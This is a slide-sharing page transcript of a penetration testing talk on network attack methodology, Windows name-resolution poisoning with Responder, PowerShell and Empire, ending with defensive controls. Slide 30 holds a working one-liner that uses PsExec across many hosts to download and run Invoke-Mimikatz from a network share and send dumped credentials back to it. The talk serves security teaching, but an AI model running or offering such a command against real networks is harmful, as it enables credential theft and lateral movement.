Presentation is loading. Please wait.

Presentation is loading. Please wait.

Common Network Penetration Testing Techniques Russel Van Tuyl.

Published byRudolph Powell Modified over 8 years ago

Similar presentations

Presentation on theme: "Common Network Penetration Testing Techniques Russel Van Tuyl."— Presentation transcript:

1 Common Network Penetration Testing Techniques Russel Van Tuyl

2 Security Analyst TN Air National Guard SANS MSISE Student Father of 2, Husband to 1 Russel.VanTuyl@gmail.com Russel C. Van Tuyl | Security Analyst | Sword & Shield Enterprise Security 1431 Centerpoint Blvd., Suite 150 | Knoxville, TN 37932 P: 865-244-3568 | M: 865-214-0579 | rcvt@sses.net

3 This is how I hack!

4 External Network (Web) Apps Internal Network Social Engineering Wireless Physical Hack All The Things

5 Recon/Intel Gathering Vulnerability Identification/Analysis Exploitation Post Exploitation Reporting (boo) Methodology

6

7 Phishing

8

9

10 Social Engineering - Pretext

11 External Assessment

12 Internal Assessment

13 How I see networks

14 Broadcast Messages Go to every host on the subnet Typically in search of a resource (like name resolution) Common Windows Broadcast Protocols NetBIOS RFC 1001 & 1002 LLMNR RFC 4795 244.0.0.252 (Link Scope Multicast) Types Windows Redirector File Server Print Server WPAD

15 NetBIOS Name Service (NBNS) Broadcast Messages

16 Link-Local Multicast Name Resolution (LLMNR) Multicast Messages

17 Web Proxy Autodiscovery Protocol (WPAD) Standard Internet Engineering Task Force (IETF) draft http://tools.ietf.org/html/draft-ietf-wrec-wpad-01 Expired December 1999 Discovery DHCP DNS Proxy Auto-Config (PAC) wpad.dat http://findproxyforurl.com

18

19 Responder by Laurent Gaffie @pythonresponder Trustwave SpiderLabs https://github.com/SpiderLabs/Responder

20

21 runas.exe

22

23 Windows PowerShell is an interactive object-oriented command environment with scripting language features that utilizes small programs called cmdlets to simplify configuration, administration, and management of heterogeneous environments in both standalone and networked typologies by utilizing standards-based remoting protocols.

24 powershell.exe Built on.NET Framework Verb-Noun Tab Complete Alias Structured Data/Objects Syntax Highlighting (version 5) Released in 2006 on XP*/Vista/Server 2003.ps1 Modules.psm1 Integrated Scripting Environment (ISE)

25 Download Cradle

26

27

28

29

30 ForEach ($h in Get-Content C:\hosts.txt){C:\PsExec.exe \\$h -d -e -u ACME\bob -p P@$$word1 -s cmd /c powershell -nop -command “& {IEX ((new-object net.webclient).downloadstring(‘\\172.16.1.205\data\Invoke- Mimikatz.ps1′));Invoke-Mimikatz -DumpCreds > \\172.16.1.205\data\%COMPUTERNAME%.txt}”}

31

32 questions?

33 Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire

34 Sensitive Data Image removed for distribution

35 Strong Passwords Password Database Local Admin Disable & Rename Implement LAPS https://support.microsoft.com/en-us/kb/3062591 Credential Theft Protected LSASS Privileged Access Workstations (PAWS) https://technet.microsoft.com/en-us/library/mt634654.aspx Least Privilege Logging Powershell v5 http://www.malwarearchaeology.com/log-md/ Monitor & restrict egress

36 Center for Internet Security (CIS) Critical Security Controls https://www.cisecurity.org/critical-controls.cfm CSC 1: Inventory of Authorized and Unauthorized Devices CSC 2: Inventory of Authorized and Unauthorized Software CSC 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers CSC 4: Continuous Vulnerability Assessment and Remediation CSC 5: Controlled Use of Administrative Privileges CSC 6: Maintenance, Monitoring, and Analysis of Audit Logs CSC 7: Email and Web Browser Protections CSC 8: Malware Defenses CSC 9: Limitation and Control of Network Ports, Protocols, and Services CSC 10: Data Recovery Capability CSC 11: Secure Configurations for Network Devices such as Firewalls, Routers, and Switches CSC 12: Boundary Defense CSC 13: Data Protection CSC 14: Controlled Access Based on the Need to Know CSC 15: Wireless Access Control CSC 16: Account Monitoring and Control CSC 17: Security Skills Assessment and Appropriate Training to Fill Gaps CSC 18: Application Software Security CSC 19: Incident Response and Management CSC 20: Penetration Tests and Red Team Exercises

37 1.Don’t patch anything 2.Don’t harden servers 3.Use default/weak passwords, in multiple places 4.Use shared accounts/passwords 5.Use poorly written applications 6.Allow unrestricted inbound traffic 7.Allow unrestricted outbound traffic 8.Use the highest possible privilege levels 9.Put everything on the Internet (bcuz YOLO!) 10. Assume everything is OK How To Get Owned in 10 Easy Steps

38 Questions?

Download ppt "Common Network Penetration Testing Techniques Russel Van Tuyl."

Similar presentations

Module 3 Windows Server 2008 Branch Office Scenario.

Module 3 Windows Server 2008 Branch Office Scenario.
System and Network Security Practices COEN 351 E-Commerce Security.

System and Network Security Practices COEN 351 E-Commerce Security.
Chapter 7 HARDENING SERVERS.

Chapter 7 HARDENING SERVERS.
1 ITC242 – Introduction to Data Communications Week 12 Topic 18 Chapter 19 Network Management.

1 ITC242 – Introduction to Data Communications Week 12 Topic 18 Chapter 19 Network Management.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 1: Introduction to Windows Server 2003.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 1: Introduction to Windows Server 2003.
Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.

Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.
Firewall 2 * Essential Network Security Book Slides. IT352 | Network Security |Najwa AlGhamdi 1.

Firewall 2 * Essential Network Security Book Slides. IT352 | Network Security |Najwa AlGhamdi 1.
Windows 2008 Overview Lecture 1. Windows Networking Evolution Windows for Workgroups – peer-to-peer networking built into the OS Windows NT – separate.

Windows 2008 Overview Lecture 1. Windows Networking Evolution Windows for Workgroups – peer-to-peer networking built into the OS Windows NT – separate.
Developing a Security Policy Chapter 2. Learning Objectives Understand why a security policy is an important part of a firewall implementation Determine.

Developing a Security Policy Chapter 2. Learning Objectives Understand why a security policy is an important part of a firewall implementation Determine.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment, Enhanced Chapter 1: Introduction to Windows Server 2003.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment, Enhanced Chapter 1: Introduction to Windows Server 2003.
Presented by INTRUSION DETECTION SYSYTEM. CONTENT Basically this presentation contains, What is TripWire? How does TripWire work? Where is TripWire used?

Presented by INTRUSION DETECTION SYSYTEM. CONTENT Basically this presentation contains, What is TripWire? How does TripWire work? Where is TripWire used?
Chapter 14 Network Management Business Aspects Architectures Technology.

Chapter 14 Network Management Business Aspects Architectures Technology.
April WebEx Intel ® Active Management Technology (AMT) LANDesk Provisioning LANDesk Server Manager.

April WebEx Intel ® Active Management Technology (AMT) LANDesk Provisioning LANDesk Server Manager.
Principles of Computer Security: CompTIA Security + ® and Beyond, Second Edition © 2010 Baselines Chapter 14.

Principles of Computer Security: CompTIA Security + ® and Beyond, Second Edition © 2010 Baselines Chapter 14.
Clinic Security and Policy Enforcement in Windows Server 2008.

Clinic Security and Policy Enforcement in Windows Server 2008.
Hands-On Microsoft Windows Server 2008 Chapter 1 Introduction to Windows Server 2008.

Hands-On Microsoft Windows Server 2008 Chapter 1 Introduction to Windows Server 2008.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.
Securing Windows 7 Lesson 10. Objectives Understand authentication and authorization Configure password policies Secure Windows 7 using the Action Center.

Securing Windows 7 Lesson 10. Objectives Understand authentication and authorization Configure password policies Secure Windows 7 using the Action Center.
1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.

1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.
Security Management prepared by Dean Hipwell, CISSP

Security Management prepared by Dean Hipwell, CISSP

Similar presentations

Ads by Google